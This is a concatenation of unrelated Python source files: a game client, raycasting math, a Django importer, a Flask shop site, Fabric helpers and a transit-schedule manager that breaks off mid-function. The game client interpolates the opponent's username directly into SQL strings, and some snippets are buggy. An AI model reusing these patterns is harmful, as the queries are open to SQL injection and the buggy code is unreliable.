results = self.getRecordAgainstOpponent()
returnMessage = (3, outcome) + results
self.sendMessage(returnMessage)
if outcome == 0:
self.insertSystemMessage("THE GAME IS A TIE")
elif outcome == 1:
self.insertSystemMessage("YOU WON THE GAME!!!")
else:
self.insertSystemMessage("YOU LOST")
self.insertSystemMessage("Wins: %d - Losses: %d - Ties: %d" % (results[0], results[1], results[2]))
def getRecordAgainstOpponent(self):
numWins = 0
numLosses = 0
numTies = 0
self.databaseCurr.execute(
"SELECT outcome FROM games WHERE user_against = '%s'" % self.opponentUsername
)
resultList = [i[0] for i in self.databaseCurr.fetchall()]
for result in resultList:
if result == 0:
numTies += 1
elif result == 1:
numWins += 1
else:
numLosses += 1
return (numWins, numLosses, numTies)
def insertGameInDatabase(self, outcome):
self.databaseCurr.execute(
"INSERT INTO games (moves, user_against, outcome) VALUES('%s', '%s', %d)" % (self.moves, self.opponentUsername, outcome)
)
self.databaseConn.commit()
def askNewGame(self):
self.wantNewGameTop = Toplevel()
l1 = Label(self.wantNewGameTop, text="%s wants a rematch" % self.opponentUsername)
l1.pack()
b_yes = Button(self.wantNewGameTop, text="accept", command=lambda:self.acceptNewGame())
b_yes.pack()
b_no = Button(self.wantNewGameTop, text="deny", command=lambda:self.denyNewGame())
b_no.pack()
def acceptNewGame(self):
self.wantNewGameTop.destroy()
self.sendMessage((9, True))
self.resetGUI()
self.turn = 1
self.gameBoard = [[0 for __ in range(6)] for _ in range(7)]
self.moves = ""
self.gameOver = False
self.ai()
self.insertSystemMessage("NEW GAME STARTED")
def denyNewGame(self):
self.sendMessage((9, False))
self.wantNewGameTop.destroy()
self.parent.destroy()
if __name__ == '__main__':
root = Tk()
s = aiUser(root)
root.mainloop() |
import math
import numpy as np
import numba as nb
from numpy import array
@nb.njit(fastmath=True)
def distance(p1: array, p2: array) -> array:
return np.sqrt((p1[0]- p2[0]) ** 2 + (p1[1]- p2[1]) ** 2)
def right_or_left(p0, p1, vec0):
vec1 = p1 - p0
return 1 if np.cross(vec0, vec1) >= 0 else -1
@nb.njit(fastmath=True)
def unit_vector(angle: int) -> array:
return array([math.cos(angle / 180 * math.pi), math.sin(angle / 180 * math.pi)])
def rotate_vector(vec: array) -> array:
return array([vec[1], -vec[0]])
def lines_to_points(lines: list [array, array]) -> list [array]:
points = []
for line in lines:
for point in line:
points.append(point)
return points
def prove_circle_intersection(pos, ray, circle):
p0, r = circle
vec0 = p0 - pos
vec1 = (np.dot(vec0, ray) / np.dot(ray, ray)) * ray
p1 = pos + vec1
if distance(p0, p1) <= r:
return True
def visible_lines(lines, pos, angle, fov):
_lines = []
vec0 = unit_vector(angle + 90)
# vec1 = unit_vector(angle - fov / 2)
# vec2 = unit_vector(angle + fov / 2)
for line in lines:
# # point 1 lies in fov
# cond1 = (right_or_left(pos, line[0], vec1) >= 0) and (right_or_left(pos, line[0], vec2) < 0)
# # point 2 lies in fov
# cond2 = (right_or_left(pos, line[1], vec1) >= 0) and (right_or_left(pos, line[1], vec2) < 0)
# one point lies in fov = 180
cond3 = (right_or_left(pos, line[0], vec0) < 0) or \
(right_or_left(pos, line[1], vec0) < 0)
if cond3:
_lines.append(line)
return _lines
def visible_points(points, pos, angle, fov):
result = []
vec0 = unit_vector(angle - fov / 2)
vec1 = unit_vector(angle + fov / 2)
for point in points:
if right_or_left(pos, point, vec0) > 0 \
and right_or_left(pos, point, vec1) < 0:
result.append(point)
return result
@nb.njit
def line_raycast(ray_point, angle, lines, fov, nrays, dangle, max_length):
points = []
ang = angle - fov // 2
for _ in range(nrays):
ang += dangle
vec = unit_vector(ang)
min_dist = 10e10
nearest_point = vec * max_length + ray_point
for line in lines:
point = line_intersection(ray_point, vec, line)
if point is not None:
new_dist = distance(ray_point, point)
if new_dist < min_dist:
min_dist = new_dist
nearest_point = point
points.append(nearest_point)
return points
@nb.njit
def line_intersection(pos: array, ray: array, line: list [array]):
x1, y1 = line[0]
x2, y2 = line[1]
x3, y3 = pos
x4, y4 = pos + ray
den = (x1 - x2) * (y3 - y4) - (y1 - y2) * (x3 - x4)
if den == 0:
return
t = ((x1 - x3) * (y3 - y4) - (y1 - y3) * (x3 - x4)) / den
if t > 1 or t < 0:
return
u = -((x1 - x2) * (y1 - y3) - (y1 - y2) * (x1 - x3)) / den
if u < 0:
return
x = x1 + t * (x2 - x1)
y = y1 + t * (y2 - y1)
return array([x, y])
def circle_intersection(pos: array, ray: array, circle: int) -> array:
p0, r = circle
x0, y0 = pos
x1, y1 = pos + ray
h, k = p0
a = (x1 - x0) ** 2 + (y1 - y0) ** 2
b = 2 * (x1 - x0) * (x0 - h) + 2 * (y1 - y0) * (y0 - k)
c = (x0 - h) ** 2 + (y0 - k) ** 2 - r ** 2
# no intersection
if b ** 2 - 4 * a * c < 0:
return
# outside point
t1 = (-b - math.sqrt(b ** 2 - 4 * a * c)) / (2 * a)
if t1 > 0:
y = y0 + t1 * (y1 - y0)
x = x0 + t1 * (x1 - x0)
return array([x, y])
# inside point
t2 = (-b + math.sqrt(b ** 2 - 4 * a * c)) / (2 * a)
if t2 > 0:
y = y0 + t2 * (y1 - y0)
x = x0 + t2 * (x1 - x0)
return array([x, y])
def circle_raycast(pos: array, angle: int, circles: list, fov, nrays, dangle, max_length):
points = []
ang = angle - fov // 2
for _ in range(nrays):
ang += dangle
ray = unit_vector(ang)
min_dist = 10e10
nearest_point = ray * max_length + pos
for circle in circles:
point = circle_intersection(pos, ray, circle)
if point is not None:
new_dist = distance(pos, point)
if new_dist < min_dist:
min_dist = new_dist
nearest_point = point
points.append(nearest_point)
return points
def raycast(pos, angle, fov, nrays, lines=[], circles=[]):
points = []
dangle = fov / nrays
ang = angle - fov // 2
for _ in range(nrays):
ang += dangle
ray = unit_vector(ang)
min_dist = 10e10
nearest_point = ray * 1000 + pos
for circle in circles:
point = circle_intersection(pos, ray, circle)
if point is not None:
new_dist = distance(pos, point)
if new_dist < min_dist:
min_dist = new_dist
nearest_point = point
for line in lines:
point = line_intersection(pos, ray, line)
if point is not None:
new_dist = distance(pos, point)
if new_dist < min_dist:
min_dist = new_dist
nearest_point = point
points.append(nearest_point)
return points
def main():
pass
if __name__ == '__main__':
main() |
class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
mid, left, right, left_num, right_num = self.partition(self, nums)
print("---")
while right_num != k - 1:
print("---")
print(k)
if right_num > k - 1:
# 从右侧找
print("right")
mid, left, right, left_num, right_num = self.partition(self, right)
else:
# 从左侧找
print("left")
k = k - right_num - 1
mid, left, right, left_num, right_num = self.partition(self, left)
return mid
def partition(self, all):
print(all)
mid = all.pop()
left_num = 0
right_num = 0
left = []
right = []
while all:
x = all.pop()
if x > mid:
right.append(x)
right_num += 1
else:
left.append(x)
left_num += 1
return mid, left, right, left_num, right_num
if __name__ == "__main__":
nums = [-1, -1]
solu = Solution
ans = solu.findKthLargest(solu, nums, 2)
print(ans) |
from apps.games import models
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from django.utils.text import slugify
import rethinkdb as r
class Command(BaseCommand):
help = 'Get count for all extra data'
def handle(self, **options):
r.connect().repl()
for x in r.db('games').table('bgg').run():
if not models.Game.objects.filter(name=x.get('name')).exists() and x.get('name'):
g = models.Game()
g.bgg = x.get('objectid')
g.name = x.get('name')
g.slug = slugify(x.get('name'))
g.age = x.get('age')
g.year_published = x.get('yearpublished')
g.playing_time = x.get('playingtime')
g.language_dependence = x.get('language_dependence') if x.get(
'language_dependence') else ''
g.max_players = x.get('maxplayers')
g.min_players = x.get('minplayers')
g.rank = x.get('rank')
g.image = x.get('image')
g.thumbnail = x.get('thumbnail')
g.bgg_url = x.get('url')
g.average_rating = x.get('averagerating')
g.num_ratings = x.get('numratings')
g.fans = x.get('fans')
g.total_plays = x.get('totalplays')
g.plays_this_month = x.get('playsthismonth')
g.users_owning = x.get('usersowning')
g.users_trading = x.get('userstrading')
g.users_wanting = x.get('userswanting')
g.expansion = x.get('expansion')
g.save()
list_of = ['boardgamecategory', 'boardgamedesigner', 'boardgameartist',
'boardgamepublisher',
'boardgamemechanic', 'boardgamesubdomain', 'boardgamefamily']
for cat in list_of:
item = x.get(cat)
if item:
self._get_data(g, item, cat)
self.stdout.write(x.get('name'))
self.stdout.write('Done')
def _get_data(self, g, item, meta):
if 'artist' in meta:
c = models.Artist
insert = g.artist
elif 'designer' in meta:
c = models.Designer
insert = g.designer
elif 'publisher' in meta:
c = models.Publisher
insert = g.publisher
elif 'category' in meta:
c = models.Category
insert = g.category
elif 'mechanic' in meta:
c = models.Mechanic
insert = g.mechanic
elif 'subdomain' in meta:
c = models.Subdomain
insert = g.subdomain
elif 'family' in meta:
c = models.Family
insert = g.family
else:
return False
for x in item:
name = x.get('name')
bgg = x.get('objectid')
if name:
slug = slugify(name)
try:
data = c.objects.get(bgg=bgg)
insert.add(data)
except c.DoesNotExist:
type_name = meta.replace('boardgame', '')
data = c(name=name, slug=slug, bgg=bgg, type=type_name)
try:
data.save()
insert.add(data)
except IntegrityError:
query = c.objects.filter(slug=slug).exists()
if query:
num = c.objects.filter(slug=slug).count()
slug = '%s-%s' % (slug, self.int_to_roman(num + 1))
data = c(name=name, slug=slug, bgg=bgg, type=type_name)
try:
data.save()
insert.add(data)
except IntegrityError:
print '%s: %s - %s - %s' % (meta, name, slug, bgg)
pass
else:
print '%s: %s - %s - %s' % (meta, name, slug, bgg)
pass
def int_to_roman(self, integer):
returnstring = ''
table = [['M', 1000], ['CM', 900], ['D', 500], ['CD', 400], ['C', 100], ['XC', 90],
['L', 50],
['XL', 40],
['X', 10], ['IX', 9], ['V', 5], ['IV', 4], ['I', 1]]
for pair in table:
while integer - pair[1] >= 0:
integer -= pair[1]
returnstring += pair[0]
return returnstring |
import os
import helpers
import matplotlib.pyplot as plt
import numpy as np
import pytest
import disba
if not os.environ.get("DISPLAY", ""):
plt.switch_backend("Agg")
@pytest.mark.parametrize(
"mode, wave, algorithm",
[
(0, "rayleigh", "dunkin"),
(0, "rayleigh", "fast-delta"),
(1, "rayleigh", "dunkin"),
(1, "rayleigh", "fast-delta"),
(0, "love", "dunkin"),
(1, "love", "dunkin"),
],
)
def test_resample(mode, wave, algorithm):
velocity_model = helpers.velocity_model(5)
t = np.logspace(0.0, 1.0, 20)
pd = disba.PhaseDispersion(*velocity_model, algorithm=algorithm)
cref = pd(t, mode, wave)
pd.resample(0.1)
cp = pd(t, mode, wave)
assert np.allclose(cref.velocity.sum(), cp.velocity.sum(), atol=0.1)
def test_depthplot(monkeypatch):
velocity_model = helpers.velocity_model(5)
monkeypatch.setattr(plt, "show", lambda: None)
disba.depthplot(velocity_model[0], velocity_model[2])
|
"""
剑指 Offer 65. 不用加减乘除做加法
写一个函数,求两个整数之和,要求在函数体内不得使用 “+”、“-”、“*”、“/” 四则运算符号。
"""
def add1(a, b):
return sum(a, b)
# 哈哈哈哈,只是用来搞笑的。
def add(a, b):
"""
计算过程不让用最简单的加减乘除,那么就只能用位运算了,位运算其实并不简单。
:param a:
:param b:
:return:
"""
x = 0xffffffff
a = a&x
b = b&x
# 这个地方分为加和位和进位计算,加和位直接做异或运算,进位是当前位的与运算。
while b != 0:
a, b = (a ^ b), (a & b) << 1 & x
return a
if __name__ == '__main__':
res = add(1, 3)
print(res) |
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index():
title = "Мир дверей"
heading = "МЕЖКОМНАТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('index.html', page_title=title, heading=heading)
@app.route('/delivery')
def delivery():
title = "Мир дверей"
heading = "МЕЖКОМНАТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('delivery.html', page_title=title, heading=heading)
@app.route('/glass')
def glass():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('glass.html', page_title=title, heading=heading)
@app.route('/interior/single_light')
def single_light():
title = "Мир дверей"
heading = "ПРОСТЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('interior/single_light.html', page_title=title, heading=heading)
@app.route('/interior/single_letters')
def single_letters():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ LETTERS"
return render_template('interior/single_letters.html', page_title=title, heading=heading)
@app.route('/interior/single_fantasy')
def single_fantasy():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ FANTASY"
return render_template('interior/single_fantasy.html', page_title=title, heading=heading)
@app.route('/interior/single_satin')
def single_satin():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ SATIN"
return render_template('interior/single_satin.html', page_title=title, heading=heading)
@app.route('/interior/single_florid')
def single_florid():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ FLORID"
return render_template('interior/single_florid.html', page_title=title, heading=heading)
@app.route('/interior/single_tripleks')
def single_tripleks():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ТРИПЛЕКС"
return render_template('interior/single_tripleks.html', page_title=title, heading=heading)
@app.route('/interior/single_illusion')
def single_illusion():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ILLUSION"
return render_template('interior/single_illusion.html', page_title=title, heading=heading)
@app.route('/interior/single_classic')
def single_classic():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ В КЛАССИЧЕСКОМ СТИЛЕ"
return render_template('interior/single_classic.html', page_title=title, heading=heading)
@app.route('/interior/single_flowers')
def single_flowers():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ FLOWERS"
return render_template('interior/single_flowers.html', page_title=title, heading=heading)
@app.route('/interior/single_foto')
def single_foto():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ С ФОТОПЕЧАТЬЮ"
return render_template('interior/single_foto.html', page_title=title, heading=heading)
@app.route('/interior/single_mirra')
def single_mirra():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ MIRRA"
return render_template('interior/single_mirra.html', page_title=title, heading=heading)
@app.route('/interior/single_loft')
def single_loft():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ЛОФТ"
return render_template('interior/single_loft.html', page_title=title, heading=heading)
@app.route('/interior/single_decor')
def single_decor():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ART DÉCOR"
return render_template('interior/single_decor.html', page_title=title, heading=heading)
@app.route('/peregorodki')
def peregorodki():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
return render_template('peregorodki.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_aluminum')
def single_aluminum():
title = "Мир дверей"
heading = "АЛЮМИНИЕВЫЕ ПЕРЕГОРОДКИ"
return render_template('peregorodki/single_aluminum.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_razdvizhnyye')
def single_razdvizhnyye():
title = "Мир дверей"
heading = "РАЗДВИЖНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ И ДВЕРИ"
return render_template('peregorodki/single_razdvizhnyye.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_apartments')
def single_apartments():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ ДЛЯ КВАРТИРЫ"
return render_template('peregorodki/single_apartments.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_mirror')
def single_mirror():
title = "Мир дверей"
heading = "ЗЕРКАЛЬНЫЕ ПЕРЕГОРОДКИ"
return render_template('peregorodki/single_mirror.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_smart')
def single_smart():
title = "Мир дверей"
heading = "СМАРТ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
return render_template('peregorodki/single_smart.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_office')
def single_office():
title = "Мир дверей"
heading = "ОФИСНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
return render_template('peregorodki/single_office.html', page_title=title, heading=heading)
@app.route('/sauna')
def sauna():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ДЛЯ САУНЫ И БАНИ"
return render_template('sauna.html', page_title=title, heading=heading)
@app.route('/sauna/single_ajio')
def single_ajio():
title = "Мир дверей"
heading = "ОФИСНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
return render_template('sauna/single_ajio.html', page_title=title, heading=heading)
@app.route('/sauna/single_sauna_light')
def single_sauna_light():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ LIGHT ДЛЯ БАНИ"
return render_template('sauna/single_sauna_light.html', page_title=title, heading=heading)
@app.route('/sauna/single_steam')
def single_steam():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ В ПАРНУЮ"
return render_template('sauna/single_steam.html', page_title=title, heading=heading)
@app.route('/sauna/single_glassjet')
def single_glassjet():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ GLASSJET ДЛЯ САУНЫ"
return render_template('sauna/single_glassjet.html', page_title=title, heading=heading)
@app.route('/sauna/single_hamam')
def single_hamam():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ХАМАМ"
return render_template('sauna/single_hamam.html', page_title=title, heading=heading)
@app.route('/sauna/single_glassjet_colored')
def single_glassjet_colored():
title = "Мир дверей"
heading = "ЦВЕТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ GLASSJET"
return render_template('sauna/single_glassjet_colored.html', page_title=title, heading=heading)
@app.route('/showers')
def showers():
title = "Мир дверей"
heading = "ДУШЕВЫЕ ОГРАЖДЕНИЯ ИЗ СТЕКЛА"
return render_template('showers.html', page_title=title, heading=heading)
@app.route('/showers/single_corners')
def single_corners():
title = "Мир дверей"
heading = "ДУШЕВЫЕ УГОЛКИ ИЗ СТЕКЛА"
return render_template('showers/single_corners.html', page_title=title, heading=heading)
@app.route('/showers/single_nishu')
def single_nishu():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДУШЕВЫЕ ДВЕРИ В НИШУ"
return render_template('showers/single_nishu.html', page_title=title, heading=heading)
@app.route('/showers/single_soul')
def single_soul():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ДВЕРИ ДЛЯ ДУША"
return render_template('showers/single_soul.html', page_title=title, heading=heading)
@app.route('/showers/single_shower_partitions')
def single_shower_partitions():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ ДЛЯ ДУША"
return render_template('showers/single_shower_partitions.html', page_title=title, heading=heading)
@app.route('/showers/single_glass_partitions')
def single_glass_partitions():
title = "Мир дверей"
heading = "РАЗДВИЖНЫЕ ДУШЕВЫЕ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
return render_template('showers/single_glass_partitions.html', page_title=title, heading=heading)
@app.route('/showers/single_bathroom_blinds')
def single_bathroom_blinds():
title = "Мир дверей"
heading = "РАЗДВИЖНЫЕ ДУШЕВЫЕ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
return render_template('showers/single_bathroom_blinds.html', page_title=title, heading=heading)
@app.route('/mirrors')
def mirrors():
title = "Мир дверей"
heading = "ЗЕРКАЛА"
return render_template('mirrors.html', page_title=title, heading=heading)
@app.route('/mirrors/single_led')
def single_led():
title = "Мир дверей"
heading = "ЗЕРКАЛА С LED ПОДСВЕТКОЙ"
return render_template('mirrors/single_led.html', page_title=title, heading=heading)
@app.route('/mirrors/single_aralia')
def single_aralia():
title = "Мир дверей"
heading = "Зеркало в ванную Aralia"
return render_template('mirrors/single_aralia.html', page_title=title, heading=heading)
@app.route('/mirrors/single_classic_mirrors')
def single_classic_mirrors():
title = "Мир дверей"
heading = "КЛАССИЧЕСКИЕ ЗЕРКАЛА ДЛЯ ДОМА"
return render_template('mirrors/single_classic_mirrors.html', page_title=title, heading=heading)
@app.route('/mirrors/single_mirror_tiles')
def single_mirror_tiles():
title = "Мир дверей"
heading = "ЗЕРКАЛЬНАЯ ПЛИТКА С ФАЦЕТОМ"
return render_template('mirrors/single_mirror_tiles.html', page_title=title, heading=heading)
@app.route('/mirrors/single_exclusive')
def single_exclusive():
title = "Мир дверей"
heading = "ЗЕРКАЛЬНАЯ ПЛИТКА С ФАЦЕТОМ"
return render_template('mirrors/single_exclusive.html', page_title=title, heading=heading)
@app.route('/mirrors/single_sophistication')
def single_sophistication():
title = "Мир дверей"
heading = "КОЛЛЕКЦИЯ ЗЕРКАЛ SOPHISTICATION ДЛЯ ДИЗАЙНЕРОВ"
return render_template('mirrors/single_sophistication.html', page_title=title, heading=heading)
@app.route('/constructions')
def constructions():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ КОНСТРУКЦИИ НА ЗАКАЗ"
return render_template('constructions.html', page_title=title, heading=heading)
@app.route('/constructions/single_pendulum')
def single_pendulum():
title = "Мир дверей"
heading = "МАЯТНИКОВЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('constructions/single_pendulum.html', page_title=title, heading=heading)
@app.route('/constructions/single_stairs')
def single_stairs():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ЛЕСТНИЦЫ И ОГРАЖДЕНИЯ"
return render_template('constructions/single_stairs.html', page_title=title, heading=heading)
@app.route('/constructions/single_aprons')
def single_aprons():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ ФАРТУКИ СКИНАЛИ"
return render_template('constructions/single_aprons.html', page_title=title, heading=heading)
@app.route('/constructions/single_office_rooms')
def single_office_rooms():
title = "Мир дверей"
heading = "ПЕРЕГОВОРНЫЕ ДЛЯ ОФИСА ИЗ СТЕКЛА"
return render_template('constructions/single_office_rooms.html', page_title=title, heading=heading)
@app.route('/constructions/single_cabinets')
def single_cabinets():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ КАБИНЕТЫ"
return render_template('constructions/single_cabinets.html', page_title=title, heading=heading)
@app.route('/installation')
def installation():
title = "Мир дверей"
heading = "СТЕКЛЯННЫЕ КОНСТРУКЦИИ НА ЗАКАЗ"
return render_template('installation.html', page_title=title, heading=heading)
if __name__=="__main__":
app.run(debug=False)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from functools import wraps
from fabric.decorators import (task, hosts, roles, runs_once, serial,
parallel, with_settings)
from fabric.network import needs_host
from revolver.core import env
from revolver import contextmanager as ctx
def sudo(func):
@wraps(func)
def wrapper(*args, **kwargs):
with ctx.sudo():
func(*args, **kwargs)
return wrapper
def multiargs(func):
@wraps(func)
def wrapper(*args, **kwargs):
if len(args) == 0:
return func()
arg = args[0]
args = args[1:]
if type(arg) in (tuple, list):
return map(lambda _: func(_, *args, **kwargs), arg)
else:
return func(arg, *args, **kwargs)
return wrapper
def inject_use_sudo(func):
@wraps(func)
def inject_wrapper(*args, **kwargs):
func_args = func.func_code.co_varnames[:func.func_code.co_argcount]
# Fabric
if "use_sudo" not in kwargs and "use_sudo" in func_args:
kwargs["use_sudo"] = env.sudo_forced
# Cuisine
if "sudo" not in kwargs and "sudo" in func_args:
kwargs["sudo"] = env.sudo_forced
return func(*args, **kwargs)
return inject_wrapper
|
import os
import shapefile
import time
from constants import KEY
from geometry import Polyline
from geometry import Point
from dataset import SERVICE, SERVICES
from dataset import BAD_STOP_IDS_BRT
from dataset import DATASETS
from dataset import OPEN_DATA_ROUTE_FILTER
from stop_updates import STOP_UPDATES, NEW_STOPS
from transit_trips import TransitTrips
from transit_shapes import TransitShapes
from transit_objects import TransitStop
from transit_objects import TransitRoute
from stop_times import StopTimes
from my_utils import seconds_to_depart_time
from brt_schedule import BRT_SCHEDULE
class BrtSchedule(object):
def __init__(self, get_route_callback):
# self._dataman = dataman
self._data = {}
self._get_route_callback = get_route_callback
for key, value in BRT_SCHEDULE.iteritems():
# print key, value
# Convert the keys from entered to internal
data = {
SERVICE.MWF : value.get('m'),
SERVICE.SAT : value.get('sa'),
SERVICE.SUN : value.get('sn'),
}
data = self._init_times(data)
# Since the entered dict keys specify multiple routes, this makes a copy
# for each route
key_parts = key.split(",")
for part in key_parts:
route_number = int(part.strip())
self._data[route_number] = data
# for key, value in self._data.iteritems():
# print "KEY", key, "VALUE", repr(value)
def _convert_times(self, data):
result = []
if data is None:
return
for item in data:
# The items are tuples of format (start_time, end_time, minutes_between departures)
# All times are even hours that is, ints)
item_new = (item[0] * 60, (item[1] * 60) - 1, item[2])
# print "fix", item, "--->", item_new
result.append(item_new)
return result
def _init_times(self, data):
# print "convert times for", repr(data)
for service in SERVICES:
data[service] = self._convert_times(data.get(service))
return data
def _get_time_minutes(self, time_str):
parts = time_str.split(":")
if len(parts) == 1:
# This is just an hour specification
result = 60 * int(parts[0])
elif len(parts) == 2:
result = 60 * int(parts[0]) + int(parts[1])
else:
raise ValueError("Invalid time string: %s" % repr(time_str))
# print "time: %s --> %d" % (time_str, result)
return result
def _get_route_number(self, route):
# Handle passed in routes or route_ids
if isinstance(route, int):
route = self._get_route_callback(route)
return route.get_number()
def _find_tuples(self, route_number, service):
data = self._data.get(route_number)
if data is None:
raise ValueError("Cant find data for route: %s" % repr(route_number))
return data.get(service)
def _find_tuple(self, route_number, service, minutes):
data = self._data.get(route_number)
if data is None:
raise ValueError("Cant find data for route: %s" % repr(route_number))
s = data.get(service)
if not s:
return
for item in s:
# print "Consider item", item
if minutes >= item[0] and minutes <= item[1]:
return item
def get_departs_per_hour(self, route, service, time_str):
t = self._get_time_minutes(time_str)
route_number = self._get_route_number(route)
item = self._find_tuple(route_number, service, t)
if item is None:
return 0
# print "Found tuple", item
result = 60.0 / float(item[2])
return result
def get_departs_per_day(self, route, service):
route_number = self._get_route_number(route)
tuples = self._find_tuples(route_number, service)
if tuples is None:
return 0
total = 0.0
# The tuples are (start_time (minutes), stop_time (minutes), and interval (minutes)
# Therefore, the total number of departures is estimated to be
# ( end_time - start_time ) / interval
#
# Of course this can result in a floating point number, which is fine for upper level
# computations
for item in tuples:
# print "depart per day process item:", item
total += (float(item[1]) - float(item[0])) / float(item[2])
return total
def get_departs_per_week(self, route):
total = self.get_departs_per_day(route, SERVICE.MWF)
total += self.get_departs_per_day(route, SERVICE.SAT)
total += self.get_departs_per_day(route, SERVICE.SUN)
return total
def get_depart_wait_minutes(self, route, service, time_str):
t = self._get_time_minutes(time_str)
route_number = self._get_route_number(route)
item = self._find_tuple(route_number, service, t)
if item is None:
return None
# print "Found tuple", item
# Item 2 is the departure frequency in minutes...
# so average wait time is frequency/2
result = float(item[2])/2.0
return result
class DatamanBase(object):
def __init__(self, dataset):
self._base_path = DATASETS.get(dataset)
self._route_dict = {}
self._stop_dict = {}
def get_depart_wait_minutes(self, route, direction, stop, service, time_str):
raise NotImplementedError
def get_departs_per_hour(self, route, direction, stop, service, time_str):
raise NotImplementedError
def get_departs_per_day(self, route, direction, stop, service):
raise NotImplementedError
def get_departs_per_week(self, route, direction, stop):
raise NotImplementedError
def get_segments(self, route_id):
raise NotImplementedError
def get_stops(self):
raise NotImplementedError
def get_route_ids(self):
raise NotImplementedError
# def get_stop(self, stop_id):
# raise NotImplementedError
# def get_route(self, route_id):
# raise NotImplementedError
# def get_routes(self):
# raise NotImplementedError
def make_round_buffers(self, radius):
stops = self.get_stops()
for stop in stops:
stop.make_round_buffer(radius)
def get_route(self, route_id):
return self._route_dict.get(route_id)
def get_stop(self, stop_id):
stop = self._stop_dict.get(stop_id)
if stop is None:
raise ValueError("Can't find stop id: %d" % stop_id)
return stop
def get_route_ids(self):
result = [k for k in self._route_dict.iterkeys()]
return result
def get_routes(self):
return [route for route in self._route_dict.itervalues()]
def get_stops(self):
return [stop for stop in self._stop_dict.itervalues()]
def get_route_name(self, route_id):
route = self.get_route(route_id)
return route.get_name()
def get_route_number(self, route_id):
route = self.get_route(route_id)
return route.get_number()
class DatamanBrt(DatamanBase):
"""
This manager processes the transit data as supplied in shapefiles (e.g., the BRT data)
"""
def __init__(self, dataset):
super(DatamanBrt, self).__init__(dataset)
print "TransitShapefile: %s" % self._base_path
self._dir_dict = {
"inbound" : "IB",
"outbound" : "OB",
"cw" : "CW",
"ccw" : "CC"
}
self._active_stop_ids = []
self._active_stops = []
self.read_directions()
self.read_stops()
self.read_direction_stops()
self._created_stop_id_base = 20000
self.add_new_stops(dataset)
self.apply_stop_updates(dataset)
self._schedule = BrtSchedule(self.get_route)
# After dictionaries built, cross-link them
for route in self._route_dict.itervalues():
route.set_stop_dict(self._stop_dict)
for stop in self._stop_dict.itervalues():
stop.set_route_dict(self._route_dict)
def get_depart_wait_minutes(self, route, direction, stop, service, time_str):
if direction != 0: return None
return self._schedule.get_depart_wait_minutes(route, service, time_str)
def get_departs_per_hour(self, route, direction, stop, service, time_str):
if direction != 0: return None
return self._schedule.get_departs_per_hour(route, service, time_str)
def get_departs_per_day(self, route, direction, stop, service):
if direction != 0: return None
return self._schedule.get_departs_per_day(route, service)
def get_departs_per_week(self, route, direction, stop):
"""
Note: The stop is not sent down to the lower level because unlike the open data,
the number of departures is the same for all stops on the route
"""
if direction != 0: return None
return self._schedule.get_departs_per_week(route)
def apply_stops_added(self, added_stops, route_id):
route = self._route_dict.get(route_id)
for added_stop in added_stops:
print "CONSIDER ADDED STOP", added_stop
stop_id = added_stop.get(KEY.STOP_ID)
if stop_id is None:
print "THIS MUST BE A LAT/LON stop"
lat = added_stop.get(KEY.LAT)
lng = added_stop.get(KEY.LNG)
if lat is None or lng is None:
raise ValueError("Bad Stop!")
stop_id = self._created_stop_id_base
self._created_stop_id_base += 1
name = "Manually Created Stop: %s" % repr(stop_id)
stop = TransitStop(stop_id, name, Point(lat, lng))
if self._stop_dict.has_key(stop_id):
